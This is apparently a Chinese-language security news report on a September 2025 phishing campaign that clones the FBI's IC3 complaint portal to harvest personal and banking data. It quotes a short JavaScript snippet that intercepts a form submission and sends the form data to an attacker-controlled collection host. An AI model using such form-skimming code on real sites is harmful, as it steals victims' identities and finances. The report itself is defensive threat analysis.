一场复杂的欺骗活动已出现，目标是联邦调查局的互联网犯罪投诉中心（IC3）。

2025年9月中旬开始，试图访问IC3官方门户网站的受害者被重定向到了伪造的域名，这些域名被精心设计成与合法网站相似的样子。

这些冒充者使用了相似的网址，例如“ic3-gov.com”和“ic3gov.org”，并复制了真实的标识，包括联邦调查局的印章和IC3的横幅。

输入了个人数据的访客发现他们的信息被窃取，用于身份盗用和金融诈骗。

IC3分析师于2025年9月18日发现了第一批此类欺诈网站，当时有多份报告显示，访问者收到了据称是确认IC3报告提交的欺骗性电子邮件。

这些信息包含指向克隆页面的链接，这些克隆页面要求提供大量个人身份信息（PII）。

尽管最初的入口点看起来像一个常规的确认通知，但该攻击活动的底层有效载荷却悄悄地将所有表单数据窃取到攻击者控制的服务器上。

在这些早期警报之后，IC3的研究人员注意到，这些伪造的基础设施是通过防弹服务提供商托管的，这使得域名能够快速轮换，且被移除的可能性极低。

那些试图“举报”犯罪或更新现有举报信息的受害者，在不知情的情况下提供了姓名、家庭住址、电话号码、电子邮件凭证、社会安全号码和银行信息——所有这些信息都是通过HTTP以明文形式传输的。

在某些情况下，这些克隆页面隐藏了额外的JavaScript模块，这些模块旨在捕获按键和Cookie，进一步危及访问者的安全。

感染机制与数据窃取

这些恶意网站纯粹通过钓鱼和客户端脚本来运作。加载时，一段JavaScript代码片段会拦截合法表单的提交事件，将用户输入重新路由到一个数据泄露端点，然后才允许浏览器继续操作或显示一个通用错误。

一个有代表性的代码片段说明了这种策略：-

document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
  evt.preventDefault();
  var formData = new FormData(this);
  fetch('https://malicious-ic3[.]net/collect', {
    method: 'POST',
    body: formData
  }).then(() => this.submit());
});

这种方法能够在不引起受害者警觉的情况下实现无缝数据捕获。该脚本还通过在所有输入字段上注入监听器来记录按键，收集凭据和会话Cookie。

由于代码直接嵌入在页面的HTML中，依赖基于特征检测的传统防病毒解决方案很难识别出这种威胁。

随后的网络分析显示，每次表单提交后不久，都会向该恶意域名发送重复的POST请求，这证实了数据已成功泄露。

专业人士应核实该网址，确保其使用带有有效.gov证书的HTTPS，并立即向联邦调查局（FBI）举报任何带有IC3标识的可疑页面。